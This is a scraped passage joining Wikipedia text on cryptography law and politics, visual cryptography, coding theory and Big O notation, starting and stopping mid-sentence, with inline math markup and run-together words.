1980s.[85]According toSteven Levy, IBM discovered differential cryptanalysis,[79]but kept the technique secret at the NSA's request. The technique became publicly known only when Biham and Shamir re-discovered and announced it some years later. The entire affair illustrates the difficulty of determining what resources and knowledge an attacker might actually have. Another instance of the NSA's involvement was the 1993Clipper chipaffair, an encryption microchip intended to be part of theCapstonecryptography-control initiative. Clipper was widely criticized by cryptographers for two reasons. The cipher algorithm (calledSkipjack) was then classified (declassified in 1998, long after the Clipper initiative lapsed). The classified cipher caused concerns that the NSA had deliberately made the cipher weak to assist its intelligence efforts. The whole initiative was also criticized based on its violation ofKerckhoffs's Principle, as the scheme included a specialescrow keyheld by the government for use by law enforcement (i.e.wiretapping).[79] Cryptography is central to digital rights management (DRM), a group of techniques for technologically controlling use ofcopyrightedmaterial, being widely implemented and deployed at the behest of some copyright holders. In 1998, U.S. PresidentBill Clintonsigned theDigital Millennium Copyright Act(DMCA), which criminalized all production, dissemination, and use of certain cryptanalytic techniques and technology (now known or later discovered); specifically, those that could be used to circumvent DRM technological schemes.[86]This had a noticeable impact on the cryptography research community since an argument can be made that any cryptanalytic research violated the DMCA. Similar statutes have since been enacted in several countries and regions, including the implementation in theEU Copyright Directive. Similar restrictions are called for by treaties signed byWorld Intellectual Property Organizationmember-states. TheUnited States Department of JusticeandFBIhave not enforced the DMCA as rigorously as had been feared by some, but the law, nonetheless, remains a controversial one.Niels Ferguson, a well-respected cryptography researcher, has publicly stated that he will not release some of his research into anIntelsecurity design for fear of prosecution under the DMCA.[87]CryptologistBruce Schneierhas argued that the DMCA encouragesvendor lock-in, while inhibiting actual measures toward cyber-security.[88]BothAlan Cox(longtimeLinux kerneldeveloper) andEdward Felten(and some of his students at Princeton) have encountered problems related to the Act.Dmitry Sklyarovwas arrested during a visit to the US from Russia, and jailed for five months pending trial for alleged violations of the DMCA arising from work he had done in Russia, where the work was legal. In 2007, the cryptographic keys responsible forBlu-rayandHD DVDcontent scrambling werediscovered and released onto the Internet. In both cases, theMotion Picture Association of Americasent out numerous DMCA takedown notices, and there was a massive Internet backlash[10]triggered by the perceived impact of such notices onfair useandfree speech. In the United Kingdom, theRegulation of Investigatory Powers Actgives UK police the powers to force suspects to decrypt files or hand over passwords that protect encryption keys. Failure to comply is an offense in its own right, punishable on conviction by a two-year jail sentence or up to five years in cases involving national security.[8]Successful prosecutions have occurred under the Act; the first, in 2009,[89]resulted in a term of 13 months' imprisonment.[90]Similar forced disclosure laws in Australia, Finland, France, and India compel individual suspects under investigation to hand over encryption keys or passwords during a criminal investigation. In the United States, the federal criminal case ofUnited States v. Fricosuaddressed whether a search warrant can compel a person to reveal anencryptionpassphraseor password.[91]TheElectronic Frontier Foundation(EFF) argued that this is a violation of the protection from self-incrimination given by theFifth Amendment.[92]In 2012, the court ruled that under theAll Writs Act, the defendant was required to produce an unencrypted hard drive for the court.[93] In many jurisdictions, the legal status of forced disclosure remains unclear. The 2016FBI–Apple encryption disputeconcerns the ability of courts in the United States to compel manufacturers' assistance in unlocking cell phones whose contents are cryptographically protected. As a potential counter-measure to forced disclosure some cryptographic software supportsplausible deniability, where the encrypted data is indistinguishable from unused random data (for example such as that of adrive which has been securely wiped).
https://en.wikipedia.org/wiki/Cryptography#Symmetric-key_cryptography
Visual cryptographyis acryptographictechnique which allows visual information (pictures, text, etc.) to be encrypted in such a way that the decrypted information appears as a visual image. One of the best-known techniques has been credited toMoni NaorandAdi Shamir, who developed it in 1994.[1]They demonstrated a visualsecret sharingscheme, where abinary imagewas broken up intonshares so that only someone with allnshares could decrypt the image, while anyn− 1shares revealed no information about the original image. Each share was printed on a separate transparency, and decryption was performed by overlaying the shares. When allnshares were overlaid, the original image would appear. There are several generalizations of the basic scheme includingk-out-of-nvisual cryptography,[2][3]and using opaque sheets but illuminating them by multiple sets of identical illumination patterns under the recording of only one single-pixel detector.[4] Using a similar idea, transparencies can be used to implement aone-time padencryption, where one transparency is a shared random pad, and another transparency acts as the ciphertext. Normally, there is an expansion of space requirement in visual cryptography. But if one of the two shares is structured recursively, the efficiency of visual cryptography can be increased to 100%.[5] Some antecedents of visual cryptography are in patents from the 1960s.[6][7]Other antecedents are in the work on perception and secure communication.[8][9] Visual cryptography can be used to protect biometric templates in which decryption does not require any complex computations.[10] In this example, thebinary imagehas been split into two component images. Each component image has apairof pixels for every pixel in the original image. These pixel pairs are shaded black or white according to the following rule: if the original image pixel was black, the pixel pairs in the component images must be complementary; randomly shade one ■□, and the other □■. When these complementary pairs are overlapped, they will appear dark gray. On the other hand, if the original image pixel was white, the pixel pairs in the component images must match: both ■□ or both □■. When these matching pairs are overlapped, they will appear light gray. So, when the two component images are superimposed, the original image appears. However, without the other component, a component image reveals no information about the original image; it is indistinguishable from a random pattern of ■□ / □■ pairs. Moreover, if you have one component image, you can use the shading rules above to produce acounterfeitcomponent image that combines with it to produce any image at all. Sharing a secret with an arbitrary number of people,n, such that at least 2 of them are required to decode the secret is one form of the visual secret sharing scheme presented byMoni NaorandAdi Shamirin 1994. In this scheme we have a secret image which is encoded intonshares printed on transparencies. The shares appear random and contain no decipherable information about the underlying secret image, however if any 2 of the shares are stacked on top of one another the secret image becomes decipherable by the human eye. Every pixel from the secret image is encoded into multiple subpixels in each share image using a matrix to determine the color of the pixels. In the (2,n) case, a white pixel in the secret image is encoded using a matrix from the following set, where each row gives the subpixel pattern for one of the components: {all permutations of the columns of} :C0=[10...010...0...10...0].{\displaystyle \mathbf {C_{0}=} {\begin{bmatrix}1&0&...&0\\1&0&...&0\\...\\1&0&...&0\end{bmatrix}}.} While a black pixel in the secret image is encoded using a matrix from the following set: {all permutations of the columns of} :C1=[10...001...0...00...1].{\displaystyle \mathbf {C_{1}=} {\begin{bmatrix}1&0&...&0\\0&1&...&0\\...\\0&0&...&1\end{bmatrix}}.} For instance in the (2,2) sharing case (the secret is split into 2 shares and both shares are required to decode the secret) we use complementary matrices to share a black pixel and identical matrices to share a white pixel. Stacking the shares we have all the subpixels associated with the black pixel now black while 50% of the subpixels associated with the white pixel remain white. Horng et al. proposed a method that allowsn− 1colluding parties to cheat an honest party in visual cryptography. They take advantage of knowing the underlying distribution of the pixels in the shares to create new shares that combine with existing shares to form a new secret message of the cheaters choosing.[11] We know that 2 shares are enough to decode the secret image using the human visual system. But examining two shares also gives some information about the 3rd share. For instance, colluding participants may examine their shares to determine when they both have black pixels and use that information to determine that another participant will also have a black pixel in that location. Knowing where black pixels exist in another party's share allows them to create a new share that will combine with the predicted share to form a new secret message. In this way a set of colluding parties that have enough shares to access the secret code can cheat other honest parties. 2×2 subpixels can also encode a binary image in each component image, as in the scheme on the right. Each white pixel of each component image is represented by two black subpixels, while each black pixel is represented by three black subpixels. When overlaid, each white pixel of the secret image is represented by three black subpixels, while each black pixel is represented by all four subpixels black. Each corresponding pixel in the component images is randomly rotated to avoid orientation leaking information about the secret image.[12]
https://en.wikipedia.org/wiki/Visual_cryptography
Coding theoryis the study of the properties ofcodesand their respective fitness for specific applications. Codes are used fordata compression,cryptography,error detection and correction,data transmissionanddata storage. Codes are studied by various scientific disciplines—such asinformation theory,electrical engineering,mathematics,linguistics, andcomputer science—for the purpose of designing efficient and reliabledata transmissionmethods. This typically involves the removal of redundancy and the correction or detection of errors in the transmitted data. There are four types of coding:[1] Data compression attempts to remove unwanted redundancy from the data from a source in order to transmit it more efficiently. For example,DEFLATEdata compression makes files smaller, for purposes such as to reduce Internet traffic. Data compression and error correction may bestudied in combination. Error correction adds usefulredundancyto the data from a source to make the transmission more robust to disturbances present on the transmission channel. The ordinary user may not be aware of many applications using error correction. A typicalmusic compact disc(CD) uses theReed–Solomon codeto correct for scratches and dust. In this application the transmission channel is the CD itself. Cell phones also use coding techniques to correct for thefadingand noise of high frequency radio transmission. Data modems, telephone transmissions, and theNASA Deep Space Networkall employ channel coding techniques to get the bits through, for example theturbo codeandLDPC codes. The decisive event which established the discipline ofinformation theory, and brought it to immediate worldwide attention, was the publication ofClaude E. Shannon's classic paper "A Mathematical Theory of Communication" in theBell System Technical Journalin July and October 1948. In this revolutionary and groundbreaking paper, the work for which Shannon had substantially completed at Bell Labs by the end of 1944, Shannon for the first time introduced the qualitative and quantitative model of communication as a statistical process underlying information theory, opening with the assertion that With it came the ideas of Shannon’s paper focuses on the problem of how best to encode theinformationa sender wants to transmit. In this fundamental work he used tools in probability theory, developed byNorbert Wiener, which were in their nascent stages of being applied to communication theory at that time. Shannon developedinformation entropyas a measure for the uncertainty in a message while essentially inventing the field ofinformation theory. Thebinary Golay codewas developed in 1949. It is an error-correcting code capable of correcting up to three errors in each 24-bit word, and detecting a fourth. Richard Hammingwon theTuring Awardin 1968 for his work atBell Labsin numerical methods, automatic coding systems, and error-detecting and error-correcting codes. He invented the concepts known asHamming codes,Hamming windows,Hamming numbers, andHamming distance. In 1972,Nasir Ahmedproposed thediscrete cosine transform(DCT), which he developed with T. Natarajan andK. R. Raoin 1973.[2]The DCT is the most widely usedlossy compressionalgorithm, the basis for multimedia formats such asJPEG,MPEGandMP3. The aim of source coding is to take the source data and make it smaller. Data can be seen as arandom variableX:Ω→X{\displaystyle X:\Omega \to {\mathcal {X}}}, wherex∈X{\displaystyle x\in {\mathcal {X}}}appears with probabilityP[X=x]{\displaystyle \mathbb {P} [X=x]}. Data are encoded by strings (words) over analphabetΣ{\displaystyle \Sigma }. A code is a function C(x){\displaystyle C(x)}is the code word associated withx{\displaystyle x}. Length of the code word is written as Expected length of a code is The concatenation of code wordsC(x1,…,xk)=C(x1)C(x2)⋯C(xk){\displaystyle C(x_{1},\ldots ,x_{k})=C(x_{1})C(x_{2})\cdots C(x_{k})}. The code word of the empty string is the empty string itself: Entropyof a source is the measure of information. Basically, source codes try to reduce the redundancy present in the source, and represent the source with fewer bits that carry more information. Data compression which explicitly tries to minimize the average length of messages according to a particular assumed probability model is calledentropy encoding. Various techniques used by source coding schemes try to achieve the limit of entropy of the source.C(x) ≥H(x), whereH(x) is entropy of source (bitrate), andC(x) is the bitrate after compression. In particular, no source coding scheme can be better than the entropy of the source. Facsimiletransmission uses a simplerun length code. Source coding removes all data superfluous to the need of the transmitter, decreasing the bandwidth required for transmission. The purpose of channel coding theory is to find codes which transmit quickly, contain many validcode wordsand can correct or at leastdetectmany errors. While not mutually exclusive, performance in these areas is a trade-off. So, different codes are optimal for different applications. The needed properties of this code mainly depend on the probability of errors happening during transmission. In a typical CD, the impairment is mainly dust or scratches. CDs usecross-interleaved Reed–Solomon codingto spread the data out over the disk.[3] Although not a very good code, a simple repeat code can serve as an understandable example. Suppose we take a block of data bits (representing sound) and send it three times. At the receiver we will examine the three repetitions bit by bit and take a majority vote. The twist on this is that we do not merely send the bits in order. We interleave them. The block of data bits is first divided into 4 smaller blocks. Then we cycle through the block and send one bit from the first, then the second, etc. This is done three times to spread the data out over the surface of the disk. In the context of the simple repeat code, this may not appear effective. However, there are more powerful codes known which are very effective at correcting the "burst" error of a scratch or a dust spot when this interleaving technique is used. Other codes are more appropriate for different applications. Deep space communications are limited by thethermal noiseof the receiver which is more of a continuous nature than a bursty nature. Likewise, narrowband modems are limited by the noise, present in the telephone network and also modeled better as a continuous disturbance.[citation needed]Cell phones are subject to rapidfading. The high frequencies used can cause rapid fading of the signal even if the receiver is moved a few inches. Again there are a class of channel codes that are designed to combat fading.[citation needed] The termalgebraic coding theorydenotes the sub-field of coding theory where the properties of codes are expressed in algebraic terms and then further researched.[citation needed] Algebraic coding theory is basically divided into two major types of codes:[citation needed] It analyzes the following three properties of a code – mainly:[citation needed] Linear block codes have the property oflinearity, i.e. the sum of any two codewords is also a code word, and they are applied to the source bits in blocks, hence the name linear block codes. There are block codes that are not linear, but it is difficult to prove that a code is a good one without this property.[4] Linear block codes are summarized by their symbol alphabets (e.g., binary or ternary) and parameters (n,m,dmin)[5]where There are many types of linear block codes, such as Block codes are tied to thesphere packingproblem, which has received some attention over the years. In two dimensions, it is easy to visualize. Take a bunch of pennies flat on the table and push them together. The result is a hexagon pattern like a bee's nest. But block codes rely on more dimensions which cannot easily be visualized. The powerful (24,12)Golay codeused in deep space communications uses 24 dimensions. If used as a binary code (which it usually is) the dimensions refer to the length of the codeword as defined above. The theory of coding uses theN-dimensional sphere model. For example, how many pennies can be packed into a circle on a tabletop, or in 3 dimensions, how many marbles can be packed into a globe. Other considerations enter the choice of a code. For example, hexagon packing into the constraint of a rectangular box will leave empty space at the corners. As the dimensions get larger, the percentage of empty space grows smaller. But at certain dimensions, the packing uses all the space and these codes are the so-called "perfect" codes. The only nontrivial and useful perfect codes are the distance-3 Hamming codes with parameters satisfying (2r– 1, 2r– 1 –r, 3), and the [23,12,7] binary and [11,6,5] ternary Golay codes.[4][5] Another code property is the number of neighbors that a single codeword may have.[6]Again, consider pennies as an example. First we pack the pennies in a rectangular grid. Each penny will have 4 near neighbors (and 4 at the corners which are farther away). In a hexagon, each penny will have 6 near neighbors. When we increase the dimensions, the number of near neighbors increases very rapidly. The result is the number of ways for noise to make the receiver choose a neighbor (hence an error) grows as well. This is a fundamental limitation of block codes, and indeed all codes. It may be harder to cause an error to a single neighbor, but the number of neighbors can be large enough so the total error probability actually suffers.[6] Properties of linear block codes are used in many applications. For example, the syndrome-coset uniqueness property of linear block codes is used in trellis shaping,[7]one of the best-knownshaping codes. The idea behind a convolutional code is to make every codeword symbol be the weighted sum of the various input message symbols. This is likeconvolutionused inLTIsystems to find the output of a system, when you know the input and impulse response. So we generally find the output of the system convolutional encoder, which is the convolution of the input bit, against the states of the convolution encoder, registers. Fundamentally, convolutional codes do not offer more protection against noise than an equivalent block code. In many cases, they generally offer greater simplicity of implementation over a block code of equal power. The encoder is usually a simple circuit which has state memory and some feedback logic, normallyXOR gates. Thedecodercan be implemented in software or firmware. TheViterbi algorithmis the optimum algorithm used to decode convolutional codes. There are simplifications to reduce the computational load. They rely on searching only the most likely paths. Although not optimum, they have generally been found to give good results in low noise environments. Convolutional codes are used in voiceband modems (V.32, V.17, V.34) and in GSM mobile phones, as well as satellite and military communication devices. Cryptographyor cryptographic coding is the practice and study of techniques forsecure communicationin the presence of third parties (calledadversaries).[8]More generally, it is about constructing and analyzingprotocolsthat block adversaries;[9]various aspects ininformation securitysuch as dataconfidentiality,data integrity,authentication, andnon-repudiation[10]are central to modern cryptography. Modern cryptography exists at the intersection of the disciplines ofmathematics,computer science, andelectrical engineering. Applications of cryptography includeATM cards,computer passwords, andelectronic commerce. Cryptography prior to the modern age was effectively synonymous withencryption, the conversion of information from a readable state to apparentnonsense. The originator of an encrypted message shared the decoding technique needed to recover the original information only with intended recipients, thereby precluding unwanted persons from doing the same. SinceWorld War Iand the advent of thecomputer, the methods used to carry out cryptology have become increasingly complex and its application more widespread. Modern cryptography is heavily based on mathematical theory and computer science practice; cryptographic algorithms are designed aroundcomputational hardness assumptions, making such algorithms hard to break in practice by any adversary. It is theoretically possible to break such a system, but it is infeasible to do so by any known practical means. These schemes are therefore termed computationally secure; theoretical advances, e.g., improvements ininteger factorizationalgorithms, and faster computing technology require these solutions to be continually adapted. There existinformation-theoretically secureschemes that provably cannot be broken even with unlimited computing power—an example is theone-time pad—but these schemes are more difficult to implement than the best theoretically breakable but computationally secure mechanisms. Aline code(also called digital baseband modulation or digitalbasebandtransmission method) is acodechosen for use within acommunications systemfor basebandtransmissionpurposes. Line coding is often used for digital data transport. It consists of representing thedigital signalto be transported by an amplitude- and time-discrete signal that is optimally tuned for the specific properties of the physical channel (and of the receiving equipment). Thewaveformpattern of voltage or current used to represent the 1s and 0s of a digital data on a transmission link is calledline encoding. The common types of line encoding areunipolar,polar,bipolar, andManchester encoding. Another concern of coding theory is designing codes that helpsynchronization. A code may be designed so that aphase shiftcan be easily detected and corrected and that multiple signals can be sent on the same channel.[citation needed] Another application of codes, used in some mobile phone systems, iscode-division multiple access(CDMA). Each phone is assigned a code sequence that is approximately uncorrelated with the codes of other phones.[citation needed]When transmitting, the code word is used to modulate the data bits representing the voice message. At the receiver, a demodulation process is performed to recover the data. The properties of this class of codes allow many users (with different codes) to use the same radio channel at the same time. To the receiver, the signals of other users will appear to the demodulator only as a low-level noise.[citation needed] Another general class of codes are theautomatic repeat-request(ARQ) codes. In these codes the sender adds redundancy to each message for error checking, usually by adding check bits. If the check bits are not consistent with the rest of the message when it arrives, the receiver will ask the sender to retransmit the message. All but the simplestwide area networkprotocols use ARQ. Common protocols includeSDLC(IBM),TCP(Internet),X.25(International) and many others. There is an extensive field of research on this topic because of the problem of matching a rejected packet against a new packet. Is it a new one or is it a retransmission? Typically numbering schemes are used, as in TCP."RFC793".RFCS.Internet Engineering Task Force(IETF). September 1981. Group testinguses codes in a different way. Consider a large group of items in which a very few are different in a particular way (e.g., defective products or infected test subjects). The idea of group testing is to determine which items are "different" by using as few tests as possible. The origin of the problem has its roots in theSecond World Warwhen theUnited States Army Air Forcesneeded to test its soldiers forsyphilis.[11] Information is encoded analogously in theneural networksofbrains, inanalog signal processing, andanalog electronics. Aspects of analog coding include analog error correction,[12]analog data compression[13]and analog encryption.[14] Neural codingis aneuroscience-related field concerned with how sensory and other information is represented in thebrainbynetworksofneurons. The main goal of studying neural coding is to characterize the relationship between thestimulusand the individual or ensemble neuronal responses and the relationship among electrical activity of the neurons in the ensemble.[15]It is thought that neurons can encode bothdigitalandanaloginformation,[16]and that neurons follow the principles of information theory and compress information,[17]and detect and correct[18]errors in the signals that are sent throughout the brain and wider nervous system.
https://en.wikipedia.org/wiki/Coding_theory
BigOnotationis a mathematical notation that describes thelimiting behaviorof afunctionwhen theargumenttends towards a particular value or infinity. Big O is a member of afamily of notationsinvented by German mathematiciansPaul Bachmann,[1]Edmund Landau,[2]and others, collectively calledBachmann–Landau notationorasymptotic notation. The letter O was chosen by Bachmann to stand forOrdnung, meaning theorder of approximation. Incomputer science, big O notation is used toclassify algorithmsaccording to how their run time or space requirements[a]grow as the input size grows.[3]Inanalytic number theory, big O notation is often used to express a bound on the difference between anarithmetical functionand a better understood approximation; a famous example of such a difference is the remainder term in theprime number theorem. Big O notation is also used in many other fields to provide similar estimates. Big O notation characterizes functions according to their growth rates: different functions with the same asymptotic growth rate may be represented using the same O notation. The letter O is used because the growth rate of a function is also referred to as theorder of the function. A description of a function in terms of big O notation usually only provides anupper boundon the growth rate of the function. Associated with big O notation are several related notations, using the symbolso{\displaystyle o},Ω{\displaystyle \Omega },ω{\displaystyle \omega }, andΘ{\displaystyle \Theta }to describe other kinds of bounds on asymptotic growth rates.[3] Letf,{\displaystyle f,}the function to be estimated, be arealorcomplexvalued function, and letg,{\displaystyle g,}the comparison function, be a real valued function. Let both functions be defined on someunboundedsubsetof the positivereal numbers, andg(x){\displaystyle g(x)}be non-zero (often, but not necessarily, strictly positive) for all large enough values ofx.{\displaystyle x.}[4]One writesf(x)=O(g(x))asx→∞{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}x\to \infty }and it is read "f(x){\displaystyle f(x)}is big O ofg(x){\displaystyle g(x)}" or more often "f(x){\displaystyle f(x)}is of the order ofg(x){\displaystyle g(x)}" if theabsolute valueoff(x){\displaystyle f(x)}is at most a positive constant multiple of the absolute value ofg(x){\displaystyle g(x)}for all sufficiently large values ofx.{\displaystyle x.}That is,f(x)=O(g(x)){\displaystyle f(x)=O{\bigl (}g(x){\bigr )}}if there exists a positive real numberM{\displaystyle M}and a real numberx0{\displaystyle x_{0}}such that|f(x)|≤M|g(x)|for allx≥x0.{\displaystyle |f(x)|\leq M\ |g(x)|\quad {\text{ for all }}x\geq x_{0}~.}In many contexts, the assumption that we are interested in the growth rate as the variablex{\displaystyle \ x\ }goes to infinity or to zero is left unstated, and one writes more simply thatf(x)=O(g(x)).{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}.}The notation can also be used to describe the behavior off{\displaystyle f}near some real numbera{\displaystyle a}(often,a=0{\displaystyle a=0}): we sayf(x)=O(g(x))asx→a{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}\ x\to a}if there exist positive numbersδ{\displaystyle \delta }andM{\displaystyle M}such that for all definedx{\displaystyle x}with0<|x−a|<δ,{\displaystyle 0<|x-a|<\delta ,}|f(x)|≤M|g(x)|.{\displaystyle |f(x)|\leq M|g(x)|.}Asg(x){\displaystyle g(x)}is non-zero for adequately large (or small) values ofx,{\displaystyle x,}both of these definitions can be unified using thelimit superior:f(x)=O(g(x))asx→a{\displaystyle f(x)=O{\bigl (}g(x){\bigr )}\quad {\text{ as }}\ x\to a}iflim supx→a|f(x)||g(x)|<∞.{\displaystyle \limsup _{x\to a}{\frac {\left|f(x)\right|}{\left|g(x)\right|}}<\infty .}And in both of these definitions thelimit pointa{\displaystyle a}(whether∞{\displaystyle \infty }or not) is acluster pointof the domains off{\displaystyle f}andg,{\displaystyle g,}i. e., in every neighbourhood ofa{\displaystyle a}there have to be infinitely many points in common. Moreover, as pointed out in the article about thelimit inferior and limit superior, thelim supx→a{\displaystyle \textstyle \limsup _{x\to a}}(at least on theextended real number line) always exists. In computer science, a slightly more restrictive definition is common:f{\displaystyle f}andg{\displaystyle g}are both required to be functions from some unbounded subset of thepositive integersto the nonnegative real numbers; thenf(x)=O(g(x)){\displaystyle f(x)=O{\bigl (}g(x){\bigr )}}if there exist positive integer numbersM{\displaystyle M}andn0{\displaystyle n_{0}}such that|f(n)|≤M|g(n)|{\displaystyle |f(n)|\leq M|g(n)|}for alln≥n0.{\displaystyle n\geq n_{0}.}[5] In typical usage theO{\displaystyle O}notation is asymptotical, that is, it refers to very largex{\displaystyle x}. In this setting, the contribution of the terms that grow "most quickly" will eventually make the other ones irrelevant. As a result, the following simplification rules can be applied: For example, letf(x)=6x4−2x3+5{\displaystyle f(x)=6x^{4}-2x^{3}+5}, and suppose we wish to simplify this function, usingO{\displaystyle O}notation, to describe its growth rate asx→∞{\displaystyle x\rightarrow \infty }. This function is the sum of three terms:6x4{\displaystyle 6x^{4}},−2x3{\displaystyle -2x^{3}}, and5{\displaystyle 5}. Of these three terms, the one with the highest growth rate is the one with the largest exponent as a function ofx{\displaystyle x}, namely6x4{\displaystyle 6x^{4}}. Now one may apply the second rule:6x4{\displaystyle 6x^{4}}is a product of6{\displaystyle 6}andx4{\displaystyle x^{4}}in which the first factor does not depend onx{\displaystyle x}. Omitting this factor results in the simplified formx4{\displaystyle x^{4}}. Thus, we say thatf(x){\displaystyle f(x)}is a "big O" ofx4{\displaystyle x^{4}}. Mathematically, we can writef(x)=O(x4){\displaystyle f(x)=O(x^{4})}. One may confirm this calculation using the formal definition: letf(x)=6x4−2x3+5{\displaystyle f(x)=6x^{4}-2x^{3}+5}andg(x)=x4{\displaystyle g(x)=x^{4}}. Applying theformal definitionfrom above, the statement thatf(x)=O(x4){\displaystyle f(x)=O(x^{4})}is equivalent to its expansion,|f(x)|≤Mx4{\displaystyle |f(x)|\leq Mx^{4}}for some suitable choice of a real numberx0{\displaystyle x_{0}}and a positive real numberM{\displaystyle M}and for allx>x0{\displaystyle x>x_{0}}. To prove this, letx0=1{\displaystyle x_{0}=1}andM=13{\displaystyle M=13}. Then, for allx>x0{\displaystyle x>x_{0}}:|6x4−2x3+5|≤6x4+|2x3|+5≤6x4+2x4+5x4=13x4{\displaystyle {\begin{aligned}|6x^{4}-2x^{3}+5|&\leq 6x^{4}+|2x^{3}|+5\\&\leq 6x^{4}+2x^{4}+5x^{4}\\&=13x^{4}\end{aligned}}}so|6x4−2x3+5|≤13x4.{\displaystyle |6x^{4}-2x^{3}+5|\leq 13x^{4}.} Big O notation has two main areas of application: In both applications, the functiong(x){\displaystyle g(x)}appearing within theO(⋅){\displaystyle O(\cdot )}is typically chosen to be as simple as possible, omitting constant factors and lower order terms. There are two formally close, but noticeably different, usages of this notation:[citation needed] This distinction is only in application and not in principle, however—the formal definition for the "big O" is the same for both cases, only with different limits for the function argument.[original research?] Big O notation is useful whenanalyzing algorithmsfor efficiency. For example, the time (or the number of steps) it takes to complete a problem of sizen{\displaystyle n}might be found to beT(n)=4n2−2n+2{\displaystyle T(n)=4n^{2}-2n+2}. Asn{\displaystyle n}grows large, then2{\displaystyle n^{2}}termwill come to dominate, so that all other terms can be neglected—for instance whenn=500{\displaystyle n=500}, the term4n2{\displaystyle 4n^{2}}is 1000 times as large as the2n{\displaystyle 2n}term. Ignoring the latter would have negligible effect on the expression's value for most purposes. Further, thecoefficientsbecome irrelevant if we compare to any otherorderof expression, such as an expression containing a termn3{\displaystyle n^{3}}orn4{\displaystyle n^{4}}. Even ifT(n)=1000000n2{\displaystyle T(n)=1000000n^{2}}, ifU(n)=n3{\displaystyle U(n)=n^{3}}, the latter will always exceed the former oncengrows larger than1000000{\displaystyle 1000000},viz.T(1000000)=10000003=U(1000000){\displaystyle T(1000000)=1000000^{3}=U(1000000)}. Additionally, the number of steps depends on the details of the machine model on which the algorithm runs, but different types of machines typically vary by only a constant factor in the number of steps needed to execute an algorithm. So the big O notation captures what remains: we write either or and say that the algorithm hasorder ofn2time complexity. The sign "=" is not meant to express "is equal to" in its normal mathematical sense, but rather a more colloquial "is", so the second expression is sometimes considered more accurate (see the "Equals sign" discussion below) while the first is considered by some as anabuse of notation.[6] Big O can also be used to describe theerror termin an approximation to a mathematical function. The most significant terms are written explicitly, and then the least-significant terms are summarized in a single big O term. Consider, for example, theexponential seriesand two expressions of it that are valid whenxis small:ex=1+x+x22!+x33!+x44!+⋯for all finitex=1+x+x22+O(x3)asx→0=1+x+O(x2)asx→0{\displaystyle {\begin{aligned}e^{x}&=1+x+{\frac {x^{2}}{2!}}+{\frac {x^{3}}{3!}}+{\frac {x^{4}}{4!}}+\dotsb &&{\text{for all finite }}x\\[4pt]&=1+x+{\frac {x^{2}}{2}}+O(x^{3})&&{\text{as }}x\to 0\\[4pt]&=1+x+O(x^{2})&&{\text{as }}x\to 0\end{aligned}}}The middle expression (the one withO(x3){\displaystyle O(x^{3})}) means the absolute-value of the errorex−(1+x+x22){\displaystyle e^{x}-(1+x+{\frac {x^{2}}{2}})}is at most some constant times|x3!|{\displaystyle |x^{3}!|}whenx{\displaystyle x}is close enough to0{\displaystyle 0}. If the functionfcan be written as a finite sum of other functions, then the fastest growing one determines the order off(n). For example, In particular, if a function may be bounded by a polynomial inn, then asntends toinfinity, one may disregardlower-orderterms of the polynomial. The setsO(nc)andO(cn)are very different. Ifcis greater than one, then the latter grows much faster. A function that grows faster thanncfor anycis calledsuperpolynomial. One that grows more slowly than any exponential function of the formcnis calledsubexponential. An algorithm can require time that is both superpolynomial and subexponential; examples of this include the fastest known algorithms forinteger factorizationand the functionnlogn. We may ignore any powers ofninside of the logarithms. The setO(logn)is exactly the same asO(log(nc)). The logarithms differ only by a constant factor (sincelog(nc) =clogn) and thus the big O notation ignores that. Similarly, logs with different constant bases are equivalent. On the other hand, exponentials with different bases are not of the same order. For example,2nand3nare not of the same order. Changing units may or may not affect the order of the resulting algorithm. Changing units is equivalent to multiplying the appropriate variable by a constant wherever it appears. For example, if an algorithm runs in the order ofn2, replacingnbycnmeans the algorithm runs in the order ofc2n2, and the big O notation ignores the constantc2. This can be written asc2n2= O(n2). If, however, an algorithm runs in the order of2n, replacingnwithcngives2cn= (2c)n. This is not equivalent to2nin general. Changing variables may also affect the order of the resulting algorithm. For example, if an algorithm's run time isO(n)when measured in terms of the numbernofdigitsof an input numberx, then its run time isO(logx)when measured as a function of the input numberxitself, becausen=O(logx). Iff1=O(g1){\displaystyle f_{1}=O(g_{1})}andf2=O(g2){\displaystyle f_{2}=O(g_{2})}thenf1+f2=O(max(|g1|,|g2|)){\displaystyle f_{1}+f_{2}=O(\max(|g_{1}|,|g_{2}|))}. It follows that iff1=O(g){\displaystyle f_{1}=O(g)}andf2=O(g){\displaystyle f_{2}=O(g)}thenf1+f2∈O(g){\displaystyle f_{1}+f_{2}\in O(g)}. Letkbe a nonzero constant. ThenO(|k|⋅g)=O(g){\displaystyle O(|k|\cdot g)=O(g)}. In other words, iff=O(g){\displaystyle f=O(g)}, thenk⋅f=O(g).{\displaystyle k\cdot f=O(g).} BigO(and little o, Ω, etc.) can also be used with multiple variables. To define bigOformally for multiple variables, supposef{\displaystyle f}andg{\displaystyle g}are two functions defined on some subset ofRn{\displaystyle \mathbb {R} ^{n}}. We say if and only if there exist constantsM{\displaystyle M}andC>0{\displaystyle C>0}such that|f(x)|≤C|g(x)|{\displaystyle |f(\mathbf {x} )|\leq C|g(\mathbf {x} )|}for allx{\displaystyle \mathbf {x} }withxi≥M{\displaystyle x_{i}\geq M}for somei.{\displaystyle i.}[7]Equivalently, the condition thatxi≥M{\displaystyle x_{i}\geq M}for somei{\displaystyle i}can be written‖x‖∞≥M{\displaystyle \|\mathbf {x} \|_{\infty }\geq M}, where‖x‖∞{\displaystyle \|\mathbf {x} \|_{\infty }}denotes theChebyshev norm. For example, the statement asserts that there exist constantsCandMsuch that whenever eitherm≥M{\displaystyle m\geq M}orn≥M{\displaystyle n\geq M}holds. This definition allows all of the coordinates ofx{\displaystyle \mathbf {x} }to increase to infinity. In particular, the statement (i.e.,∃C∃M∀n∀m⋯{\displaystyle \exists C\,\exists M\,\forall n\,\forall m\,\cdots }) is quite different from (i.e.,∀m∃C∃M∀n⋯{\displaystyle \forall m\,\exists C\,\exists M\,\forall n\,\cdots }). Under this definition, the subset on which a function is defined is significant when generalizing statements from the univariate setting to the multivariate setting. For example, iff(n,m)=1{\displaystyle f(n,m)=1}andg(n,m)=n{\displaystyle g(n,m)=n}, thenf(n,m)=O(g(n,m)){\displaystyle f(n,m)=O(g(n,m))}if we restrictf{\displaystyle f}andg{\displaystyle g}to[1,∞)2{\displaystyle [1,\infty )^{2}}, but not if they are defined on[0,∞)2{\displaystyle [0,\infty )^{2}}. This is not the only generalization of big O to multivariate functions, and in practice, there is 